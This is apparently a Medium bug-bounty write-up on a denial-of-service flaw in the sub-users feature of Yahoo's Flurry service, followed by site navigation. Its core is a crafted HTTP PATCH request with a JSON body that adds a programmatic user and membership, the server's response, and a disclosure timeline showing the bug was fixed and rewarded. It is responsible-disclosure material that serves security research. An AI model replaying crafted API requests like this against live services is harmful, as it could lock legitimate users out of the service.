DOS attack in Yahoo, How i was able to deny new users from service?

Sub-Users feature
  • Invite a sub user with a customized permissions
  • Create a programmatic user with api permissions
PATCH /pulse/v1/ HTTP/2
Host: ecto.flurry.com
[{“op”:”add”,”path”:”user”,”value”:{“type”:”user”,”id”:”5b1b8f87–9d79–4516–8576-f77e4411a46a”,”attributes”:{“email”:”354732_bd6adce9–2118–4fb9-a043–009f49968553@programmatic.flurry.com”,”programmatic”:”true”}}},{“op”:”add”,”path”:”user/5b1b8f87–9d79–4516–8576-f77e4411a46a/memberships”,”value”:{“type”:”membership”,”id”:”f3ca1d13–12d1–4b0c-8faa-fc14ffb499a3",”attributes”:{“role”:”NONE”,”title”:*",”productRoles”:{“Analytics”:”VIEWER”,”AppSpot”:”VIEWER”,”AdAnalytics”:”NONE”,”RawDataDownload”:”DEV”,”GDPRDataSubjectRights”:”NONE”}},”relationships”:{“company”:{“data”:[{“type”:”company”,”id”:”354732"}]},”user”:{“data”:[{“type”:”user”,”id”:”5b1b8f87–9d79–4516–8576-f77e4411a46a”}]}}}}]
HTTP/2 200 OK[{“data”:{“type”:”user”,”id”:”482035",”attributes”:{“email”:”mostafa@gmail.com”,”firstName”:null,”lastName”:null,”programmatic”:true},”relationships”:{“memberships”:{“data”:[{“type”:”membership”,”id”:”547510"}]}}}},{“data”:{“type”:”membership”,”id”:”547510",”attributes”:{“creationDate”:null,”limitAccess”:false,”limitedAccessProjects”:[],”primaryMembership”:false,”productRoles”:{“Analytics”:”VIEWER”,”AppSpot”:”VIEWER”,”AdAnalytics”:”NONE”,”RawDataDownload”:”DEV”,”GDPRDataSubjectRights”:”NONE”},”role”:”NONE”,”title”:”Cairo programmatic 90477"},”relationships”:{“company”:{“data”:{“type”:”company”,”id”:”354732"}},”user”:{“data”:{“type”:”user”,”id”:”482035"}}}}}]
  • December 17,2019 — Bug reported
  • December 21,2019 — Bug triaged
  • January 28,2020 — Bug resolved
  • February 12,2020–Bounty rewarded 1000$

--

--

--

I’m a Penetration Tester, Bug Hunter @ HackerOne

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Getting Started with OAuth 2.0

Do you want to be the face of Vice Industry Token?

how i earned 56000 as my first bounty from hackerone

Adventures with Facebook’s session cookie

Email Security for Law Firms with Box & mxHero

{UPDATE} Get+Together Hack Free Resources Generator

JSON Web Token (JWT) Authentication&CSRF (Cross-site Request Forgery)

Did You know that your Digital Breadcrumbs are everywhere?

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Mostafa Mamdoh

Mostafa Mamdoh

I’m a Penetration Tester, Bug Hunter @ HackerOne

More from Medium

WebAppSec: Parameter Tampering

Are You Safe??

Broken Link hijacking — What it is and how to get bounties with it! $$$

Leaked Database of CGG Website: GOVT- BUG (CRITICAL)